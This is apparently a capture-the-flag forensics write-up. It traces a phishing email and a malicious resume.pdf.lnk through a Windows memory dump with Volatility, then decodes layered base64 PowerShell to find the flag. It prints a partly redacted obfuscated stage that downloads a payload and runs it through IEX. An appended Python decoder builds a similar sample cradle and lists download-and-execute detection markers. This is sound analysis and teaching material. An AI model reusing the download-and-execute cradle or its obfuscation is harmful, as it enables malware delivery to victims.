Reminiscent
Suspicious traffic was detected from a recruiter's virtual PC. A memory dump of the offending VM was captured before it was removed from the network for imaging and analysis. Our recruiter mentioned he received an email from someone regarding their resume. A copy of the email was recovered and is provided for reference. Find and decode the source of the malware to find the flag.
Download files!
Install Volatility
Install Thunderbird
Get some information on the files
┌──(kali㉿kali)-[~/…/hackthebox/Forensics/reminiscent/reminiscent]
└─$ cat imageinfo.txt
Suggested Profile(s) : Win7SP1x64, Win7SP0x64, Win2008R2SP0x64, Win2008R2SP1x64_23418, Win2008R2SP1x64, Win7SP1x64_23418
AS Layer1 : WindowsAMD64PagedMemory (Kernel AS)
AS Layer2 : VirtualBoxCoreDumpElf64 (Unnamed AS)
AS Layer3 : FileAddressSpace (/home/infosec/dumps/mem_dumps/01/flounder-pc-memdump.elf)
PAE type : No PAE
DTB : 0x187000L
KDBG : 0xf800027fe0a0L
Number of Processors : 2
Image Type (Service Pack) : 1
KPCR for CPU 0 : 0xfffff800027ffd00L
KPCR for CPU 1 : 0xfffff880009eb000L
KUSER_SHARED_DATA : 0xfffff78000000000L
Image date and time : 2017-10-04 18:07:30 UTC+0000
Image local date and time : 2017-10-04 11:07:30 -0700
┌──(kali㉿kali)-[~/…/hackthebox/Forensics/reminiscent/reminiscent]
└─$ file flounder-pc-memdump.elf
flounder-pc-memdump.elf: ELF 64-bit LSB core file, x86-64, version 1 (SYSV)
┌──(kali㉿kali)-[~/…/hackthebox/Forensics/reminiscent/reminiscent]
└─$ file Resume.eml
Resume.eml: SMTP mail, ASCII text, with CRLF line terminators
┌──(kali㉿kali)-[~/…/hackthebox/Forensics/reminiscent/reminiscent]
└─$ strings Resume.eml
Return-Path: <bloodworm@madlab.lcl>
Delivered-To: madlab.lcl-flounder@madlab.lcl
Received: (qmail 2609 invoked by uid 105); 3 Oct 2017 02:30:24 -0000
MIME-Version: 1.0
Content-Type: multipart/alternative;
boundary="=_a8ebc8b42c157d88c1096632aeae0559"
Date: Mon, 02 Oct 2017 22:30:24 -0400
From: Brian Loodworm <bloodworm@madlab.lcl>
To: flounder@madlab.lcl
Subject: Resume
Organization: HackTheBox
Message-ID: <add77ed2ac38c3ab639246956c25b2c2@madlab.lcl>
X-Sender: bloodworm@madlab.lcl
Received: from mail.madlab.lcl (HELO mail.madlab.lcl) (127.0.0.1)
by mail.madlab.lcl (qpsmtpd/0.96) with ESMTPSA (ECDHE-RSA-AES256-GCM-SHA384 encrypted); Mon, 02 Oct 2017 22:30:24 -0400
--=_a8ebc8b42c157d88c1096632aeae0559
Content-Transfer-Encoding: 7bit
Content-Type: text/plain; charset=US-ASCII
Hi Frank, someone told me you would be great to review my resume..
Could you have a look?
resume.zip [1]
Links:
------
[1] http://10.10.99.55:8080/resume.zip
--=_a8ebc8b42c157d88c1096632aeae0559
Content-Transfer-Encoding: quoted-printable
Content-Type: text/html; charset=UTF-8
<html><head><meta http-equiv=3D"Content-Type" content=3D"text/html; charset=
=3DUTF-8" /></head><body style=3D'font-size: 10pt; font-family: Verdana,Gen=
eva,sans-serif'>
<div class=3D"pre" style=3D"margin: 0; padding: 0; font-family: monospace">=
<br /> Hi Frank, someone told me you would be great to review my resume.. c=
uold you have a look?<br /> <br /><a href=3D"http://10.10.99.55:8080/resume=
=2Ezip">resume.zip</a></div>
</body></html>
--=_a8ebc8b42c157d88c1096632aeae0559--
Let's use Volatility!
┌──(kali㉿kali)-[~/…/hackthebox/Forensics/reminiscent/reminiscent]
└─$ python3 ~/Tools/volatility3-1.0.0/vol.py -f flounder-pc-memdump.elf windows.pstree.PsTree
Volatility 3 Framework 1.0.0
Progress: 100.00 PDB scanning finished
PID PPID ImageFileName Offset(V) Threads Handles SessionId Wow64 CreateTime ExitTime
4 0 System 0xfa8000839060 83 477 N/A False 2017-10-04 18:04:27.000000 N/A
* 272 4 smss.exe 0xfa8000839060 2 30 N/A False 2017-10-04 18:04:27.000000 N/A
348 328 csrss.exe 0xfa8000839060 9 416 0 False 2017-10-04 18:04:29.000000 N/A
376 328 wininit.exe 0xfa8000839060 3 77 0 False 2017-10-04 18:04:29.000000 N/A
* 500 376 lsm.exe 0xfa8000839060 11 150 0 False 2017-10-04 18:04:30.000000 N/A
* 476 376 services.exe 0xfa8000839060 11 201 0 False 2017-10-04 18:04:29.000000 N/A
** 384 476 svchost.exe 0xfa8000839060 17 386 0 False 2017-10-04 18:04:30.000000 N/A
*** 432 384 winlogon.exe 0xfa8000839060 4 112 1 False 2017-10-04 18:04:29.000000 N/A
*** 396 384 csrss.exe 0xfa8000839060 9 283 1 False 2017-10-04 18:04:29.000000 N/A
**** 2772 396 conhost.exe 0xfa8000839060 2 55 1 False 2017-10-04 18:06:58.000000 N/A
** 868 476 svchost.exe 0xfa8000839060 21 429 0 False 2017-10-04 18:04:30.000000 N/A
*** 2020 868 dwm.exe 0xfa8000839060 4 72 1 False 2017-10-04 18:04:41.000000 N/A
** 900 476 svchost.exe 0xfa8000839060 41 977 0 False 2017-10-04 18:04:30.000000 N/A
** 1092 476 svchost.exe 0xfa8000839060 19 321 0 False 2017-10-04 18:04:31.000000 N/A
** 1704 476 SearchIndexer. 0xfa8000839060 16 734 0 False 2017-10-04 18:04:47.000000 N/A
*** 1960 1704 SearchProtocol 0xfa8000839060 6 311 0 False 2017-10-04 18:04:48.000000 N/A
*** 812 1704 SearchFilterHo 0xfa8000839060 4 92 0 False 2017-10-04 18:04:48.000000 N/A
** 2120 476 svchost.exe 0xfa8000839060 12 335 0 False 2017-10-04 18:06:32.000000 N/A
** 2248 476 wmpnetwk.exe 0xfa8000839060 18 489 0 False 2017-10-04 18:06:33.000000 N/A
** 600 476 svchost.exe 0xfa8000839060 12 360 0 False 2017-10-04 18:04:30.000000 N/A
*** 592 600 WmiPrvSE.exe 0xfa8000839060 9 127 0 False 2017-10-04 18:06:35.000000 N/A
*** 2924 600 WmiPrvSE.exe 0xfa8000839060 10 204 0 False 2017-10-04 18:06:26.000000 N/A
** 1196 476 svchost.exe 0xfa8000839060 28 333 0 False 2017-10-04 18:04:31.000000 N/A
** 664 476 VBoxService.ex 0xfa8000839060 12 118 0 False 2017-10-04 18:04:30.000000 N/A
** 1052 476 spoolsv.exe 0xfa8000839060 13 277 0 False 2017-10-04 18:04:31.000000 N/A
** 728 476 svchost.exe 0xfa8000839060 7 270 0 False 2017-10-04 18:04:30.000000 N/A
** 1720 476 taskhost.exe 0xfa8000839060 8 148 1 False 2017-10-04 18:04:36.000000 N/A
** 1840 476 sppsvc.exe 0xfa8000839060 4 145 0 False 2017-10-04 18:04:37.000000 N/A
** 792 476 svchost.exe 0xfa8000839060 21 443 0 False 2017-10-04 18:04:30.000000 N/A
** 988 476 svchost.exe 0xfa8000839060 13 286 0 False 2017-10-04 18:04:30.000000 N/A
* 492 376 lsass.exe 0xfa8000839060 8 590 0 False 2017-10-04 18:04:30.000000 N/A
2044 2012 explorer.exe 0xfa8000839060 36 926 1 False 2017-10-04 18:04:41.000000 N/A
* 496 2044 powershell.exe 0xfa8000839060 12 300 1 False 2017-10-04 18:06:58.000000 N/A
** 2752 496 powershell.exe 0xfa8000839060 20 396 1 False 2017-10-04 18:07:00.000000 N/A
* 1476 2044 VBoxTray.exe 0xfa8000839060 13 146 1 False 2017-10-04 18:04:42.000000 N/A
* 2812 2044 thunderbird.ex 0xfa8000839060 50 534 1 True 2017-10-04 18:06:24.000000 N/A
What about finding the resume file with a file scan?
┌──(kali㉿kali)-[~/…/hackthebox/Forensics/reminiscent/reminiscent]
└─$ python3 ~/Tools/volatility3-1.0.0/vol.py -f flounder-pc-memdump.elf windows.filescan.FileScan | grep -i resume
0x1e1f6200 \Users\user\Desktop\resume.pdf.lnk 216
0x1e8feb70 \Users\user\Desktop\resume.pdf.lnk 216
Let's try to get the file... The next command is not completely clean (its output is cut short below)...
┌──(kali㉿kali)-[~/…/hackthebox/Forensics/reminiscent/reminiscent]
└─$ python3 ~/Tools/volatility3-1.0.0/vol.py -f flounder-pc-memdump.elf windows.dumpfiles.DumpFiles --pid 496
Volatility 3 Framework 1.0.0
Progress: 100.00 PDB scanning finished
Cache FileObject FileName Result
DataSectionObject 0xfa8001cfeb70 resume.pdf.lnk file.0xfa8001cfeb70.0xfa80022ac740.DataSectionObject.resume.pdf.lnk.dat
SharedCacheMap 0xfa8001cfeb70 resume.pdf.lnk file.0xfa8001cfeb70.0xfa80017dcc60.SharedCacheMap.resume.pdf.lnk.vacb
ImageSectionObject 0xfa80017f7be0 System.Transactions.dll file.0xfa80017f7be0.0xfa8000887c50.ImageSectionObject.System.Transactions.dll.img
ImageSectionObject 0xfa8000e2d400 System.Transactions.dll file.0xfa8000e2d400.0xfa8000887c50.ImageSectionObject.System.Transactions.dll.img
ImageSectionObject 0xfa8001664f20 ntdll.dll file.0xfa8001664f20.0xfa800167a9a0.ImageSectionObject.ntdll.dll.img
<keyboard interrupt>
Cut out the rest; the first two files are the ones we want!
String it out!
┌──(kali㉿kali)-[~/…/hackthebox/Forensics/reminiscent/reminiscent]
└─$ strings file.0xfa8001cfeb70.0xfa80017dcc60.SharedCacheMap.resume.pdf.lnk.vacb
/C:\
DKfp
Windows
DKfp*
System32
WINDOW~1
v1.0
KV}*
powershell.exe
K6}*
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
%SystemRoot%\system32\SHELL32.dll
1SPS
cABvAHcAZQByAHMAaABlAG<redacted>QA=
,&fbM
,&fbM
Base64?
┌──(kali㉿kali)-[~/…/hackthebox/Forensics/reminiscent/reminiscent]
└─$ echo 'RwA4AEEAWgB3AEIAbgBBA<redacted>BnAEEAcgBBAEMAUQBBAFMAdwBBAHAAQQBDAGsAQQBmAEEAQgBKAEEARQBVAEEAVwBBAEEAPQA=' | base64 -d
powershell -noP -sta -w 1 -enc JABHA<redacted>UAWAA=
More base64?
┌──(kali㉿kali)-[~/…/hackthebox/Forensics/reminiscent/reminiscent]
└─$ echo 'JABHA<redacted>AEUAWAA=' | base64 -d
$GroUPPOLiCYSEttINGs = [rEF].ASseMBLY.GEtTypE('System.Management.Automation.Utils')."GEtFIE`ld"('cachedGroupPolicySettings'<redacted>$flag='HTB{$_j0G_y0uR_M3m0rY_$}';$DatA=$WC.DoWNLoaDDATA($SeR+$t);$iv=$daTA[0..3];$DAta=$DaTa[4..$DAta.LenGTH];-JOIN[CHAr[]](& $R $datA ($IV+$K))|IEX
Flag!
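As an added example (not part of the original writeup), this Python decoder automates the two manual `base64 -d` steps above: it peels nested `-enc` layers, detecting the UTF-16LE that PowerShell's -EncodedCommand uses, and lists the download-and-execute markers that appear in the final stage. The sample blob, the placeholder URL and the marker list are constructed here; the challenge's own blob is redacted on the page.

```python
import base64

# Constructed sample, not the challenge's redacted blob: a stage wrapped the same
# way the .lnk on this page wraps its payload (base64 of UTF-16LE, twice).
INNER_SCRIPT = ("$WC=New-Object Net.WebClient;$DatA=$WC.DownloadData('http://placeholder.invalid/x');"
                "-JOIN[CHAr[]]$DatA|IEX")
# Markers taken from the decoded stage on this page, plus the long form of IEX.
MARKERS = ("iex", "invoke-expression", "downloaddata", "downloadstring", "-join[char[]]")


def encode_powershell(text: str) -> str:
    """Base64 of UTF-16LE text, which is what powershell.exe -EncodedCommand expects."""
    return base64.b64encode(text.encode("utf-16-le")).decode("ascii")


def decode_layer(blob: str) -> str:
    """Decode one base64 layer; UTF-16LE ASCII shows up as a NUL in every odd byte."""
    raw = base64.b64decode(blob)
    if raw[1::2].count(0) > len(raw) // 4:
        return raw.decode("utf-16-le", errors="replace")
    return raw.decode("utf-8", errors="replace")


def find_encoded_argument(command_line: str):
    """Return the operand of -enc (any unambiguous prefix of -EncodedCommand), else None."""
    tokens = command_line.split()
    for i, tok in enumerate(tokens[:-1]):
        name = tok.lstrip("-/").lower()
        if tok[:1] in "-/" and name and "encodedcommand".startswith(name):
            return tokens[i + 1].strip("'\"")
    return None


def unwrap_encoded_powershell(blob: str, max_depth: int = 5) -> list:
    """Peel nested -enc layers, as the page does by hand; returns every decoded layer."""
    layers, current = [], blob
    for _ in range(max_depth):
        text = decode_layer(current)
        layers.append(text)
        current = find_encoded_argument(text)
        if current is None:
            break
    return layers


def triage(script: str) -> list:
    """List the download-and-execute markers present in a decoded stage (case-insensitive)."""
    low = script.lower()
    return [m for m in MARKERS if m in low]


# Outer layer mirrors the command line recovered from the .lnk: powershell -noP -sta -w 1 -enc ...
SAMPLE_BLOB = encode_powershell("powershell -noP -sta -w 1 -enc " + encode_powershell(INNER_SCRIPT))

if __name__ == "__main__":
    print(*unwrap_encoded_powershell(SAMPLE_BLOB), sep="\n---\n")
```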